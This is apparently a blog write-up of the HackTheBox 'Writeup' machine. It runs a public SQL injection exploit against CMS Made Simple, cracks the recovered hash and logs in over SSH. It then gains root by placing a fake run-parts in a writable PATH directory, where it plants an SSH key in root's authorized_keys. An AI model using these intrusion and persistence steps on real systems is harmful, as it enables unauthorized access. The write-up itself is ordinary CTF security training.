Posts HackTheBox - Writeup
Post
Cancel

HackTheBox - Writeup

BoxInfo

Summary

  • We use SQL Injection exploit for an old version of CMS Made Simple.
  • User has write permissions in /usr/local/bin, so we use pspy to find commands ran without absolute path.
  • We create malicious executable in /usr/local/bin to perform relative path injection.

Recon

Nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
root@kali:~# nmap -sC -sV 10.10.10.138
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-20 16:17 EDT
Nmap scan report for 10.10.10.138
Host is up (0.30s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 dd:53:10:70:0b:d0:47:0a:e2:7e:4a:b6:42:98:23:c7 (RSA)
|   256 37:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:bd:28 (ECDSA)
|_  256 93:ea:a8:40:42:c1:a8:33:85:b3:56:00:62:1c:a0:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 1 disallowed entry 
|_/writeup/
|_http-title: Nothing here yet.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.80 seconds

Port 80

We can see an email id on the home page –> jkr@writeup.htb

From the Nmap result, we know that /writeup/ is a disallowed entry in robots.txt

CMS Made Simple

From the source code, we know the website uses CMS Made Simple

http://dev.cmsmadesimple.org/project/files/6

the copyright is from 2004-2019 and the versions released in 2019 are from 2.2.9 to 2.2.13

Searchsploit

1
2
3
4
5
6
7
8
9
10
root@kali:~# searchsploit cms made simple 2.2
----------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                         |  Path
----------------------------------------------------------------------- ---------------------------------
CMS Made Simple 1.2.2 Module TinyMCE - SQL Injection                   | php/webapps/4810.txt
CMS Made Simple 2.2.5 - (Authenticated) Remote Code Execution          | php/webapps/44976.py
CMS Made Simple 2.2.7 - (Authenticated) Remote Code Execution          | php/webapps/45793.py
CMS Made Simple < 2.2.10 - SQL Injection                               | php/webapps/46635.py
----------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Only 2.2.10 SQL Injection comes in the required version range

1
2
3
4
5
6
7
8
root@kali:~# searchsploit -m 46635

  Exploit: CMS Made Simple < 2.2.10 - SQL Injection
      URL: https://www.exploit-db.com/exploits/46635
     Path: /usr/share/exploitdb/exploits/php/webapps/46635.py
File Type: Python script, ASCII text executable, with CRLF line terminators

Copied to: /root/46635.py

SQL Injection

1
2
3
4
5
6
7
8
9
10
11
12
13
14
root@kali:~# python 46635.py
[+] Specify an url target
[+] Example usage (no cracking password): exploit.py -u http://target-uri
[+] Example usage (with cracking password): exploit.py -u http://target-uri --crack -w /path-wordlist
[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based.

root@kali:~# python 46635.py -u http://10.10.10.138/writeup --crack -w /usr/share/wordlists/rockyou.txt

[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7
[*] Now try to crack password
[+] Password cracked: raykayjay9

We got the password for jkr –> jkr:raykayjay9

SSH as jkr

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
root@kali:~# ssh jkr@writeup.htb
jkr@writeup.htb's password: 
Linux writeup 4.9.0-8-amd64 x86_64 GNU/Linux

The programs included with the Devuan GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Aug 20 17:20:55 2020 from 10.10.14.55
jkr@writeup:~$ ls
user.txt
jkr@writeup:~$ cat user.txt 
d4e493fd4068afc9eb1aa6a55319f978

PrivEsc

LinPEAS.sh

I tranferred linPEAS.sh using scp

1
2
3
root@kali:~# scp linpeas.sh jkr@writeup.htb:/tmp
jkr@writeup.htb's password: 
linpeas.sh                       100%  157KB  50.6KB/s   00:03

linPEAS highlighted some text in the result in yellow which means its 99% a PE vector

PATH environment variable

As a member of staff group, jkr has write permissions in /usr/local/bin

1
2
jkr@writeup:~$ echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

As /usr/local/bin comes at the beginning, executable are first check in this directory for absolute path

pspy

We can use pspy to see which commands are being run on the machine without using absolute path

https://github.com/DominicBreuker/pspy

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
jkr@writeup:/tmp$ ./pspy64  
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855  
  
  
     ██▓███    ██████  ██▓███ ▓██   ██▓  
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒  
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░  
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░  
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░  
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒  
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░  
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░  
                   ░           ░ ░  
                               ░ ░  
  
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2020/08/20 21:17:11 CMD: UID=1000 PID=9841   | ./pspy64
2020/08/20 21:17:11 CMD: UID=0    PID=9831   |
2020/08/20 21:17:11 CMD: UID=0    PID=9814   |
2020/08/20 21:17:11 CMD: UID=1000 PID=9785   | -bash
2020/08/20 21:17:11 CMD: UID=1000 PID=9784   | sshd: jkr@pts/0
2020/08/20 21:17:11 CMD: UID=0    PID=9775   | sshd: jkr [priv]
2020/08/20 21:17:11 CMD: UID=33   PID=9669   | /usr/sbin/apache2 -k start
2020/08/20 21:17:11 CMD: UID=0    PID=9      |
2020/08/20 21:17:11 CMD: UID=0    PID=1794   | /bin/bash /usr/bin/mysqld_safe 
2020/08/20 21:17:11 CMD: UID=0    PID=1735   | /usr/bin/python3 /usr/bin/fail2ban-server -s /var/run/fail2ban/fail2ban.sock -p /var/run/fail2ban/fail2ban.pid -b 
2020/08/20 21:17:11 CMD: UID=0    PID=17     | 
2020/08/20 21:17:11 CMD: UID=0    PID=1690   | /usr/sbin/elogind -D 
2020/08/20 21:17:11 CMD: UID=0    PID=1641   | /usr/sbin/cron 
2020/08/20 21:17:11 CMD: UID=101  PID=1639   | /usr/bin/dbus-daemon --system 

pspy doesn’t give anything useful but if we SSH using another terminal, it shows a command without absolute path

1
2
3
4
5
6
7
8
9
10
11
12
2020/08/20 21:24:19 CMD: UID=0    PID=9871   | sshd: [accepted]
2020/08/20 21:24:19 CMD: UID=0    PID=9872   | sshd: [accepted]  
2020/08/20 21:24:22 CMD: UID=0    PID=9873   | sshd: jkr [priv]  
2020/08/20 21:24:22 CMD: UID=0    PID=9874   | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new 
2020/08/20 21:24:22 CMD: UID=0    PID=9875   | run-parts --lsbsysinit /etc/update-motd.d 
2020/08/20 21:24:22 CMD: UID=0    PID=9876   | /bin/sh /etc/update-motd.d/10-uname 
2020/08/20 21:24:22 CMD: UID=0    PID=9877   | sshd: jkr [priv]  
2020/08/20 21:24:23 CMD: UID=1000 PID=9878   | sshd: jkr@pts/1   
2020/08/20 21:24:23 CMD: UID=1000 PID=9880   | -bash 
2020/08/20 21:24:23 CMD: UID=1000 PID=9879   | -bash 
2020/08/20 21:24:23 CMD: UID=1000 PID=9881   | -bash 
2020/08/20 21:24:23 CMD: UID=1000 PID=9882   | -bash

Relative Path Injection

run-parts command does not use absolute path, so we can create our own run-parts executable in /usr/local/bin

1
2
jkr@writeup:/tmp$ which run-parts
/bin/run-parts

I used ssh-keygen to generate new SSH keys and created run-parts executable that copies my public key to root’s authorized_keys file

1
2
3
4
5
6
jkr@writeup:/usr/local/bin$ cat run-parts
mkdir /root/.ssh
echo 'ssh-rsa AAAAB3Nza......2ueEB78X5OE0lU= root@kali' > /root/.ssh/authorized_keys
jkr@writeup:/usr/local/bin$ chmod +x run-parts
jkr@writeup:/usr/local/bin$ ls -al run-parts
-rwxr-xr-x 1 jkr staff 600 Aug 20 22:05 run-parts

Now if we SSH as jkr in another terminal, own run-parts executable should be executed and we can SSH as root

1
2
3
4
5
6
7
8
9
10
11
12
13
root@kali:~# ssh -i id_rsa root@writeup.htb

The programs included with the Devuan GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Aug 23 05:13:53 2019
root@writeup:~# ls
bin  root.txt
root@writeup:~# cat root.txt 
eeba47f60b48ef92b734f9b6198d7226

We saw another command in the pspy result –> /bin/sh /etc/update-motd.d/10-uname
the 10-uname file uses uname command without absolute path, so instead of creating run-parts we can also create uname for privEsc

1
2
3
jkr@writeup:~$ cat /etc/update-motd.d/10-uname 
#!/bin/sh
uname -rnsom

This post is licensed under CC BY 4.0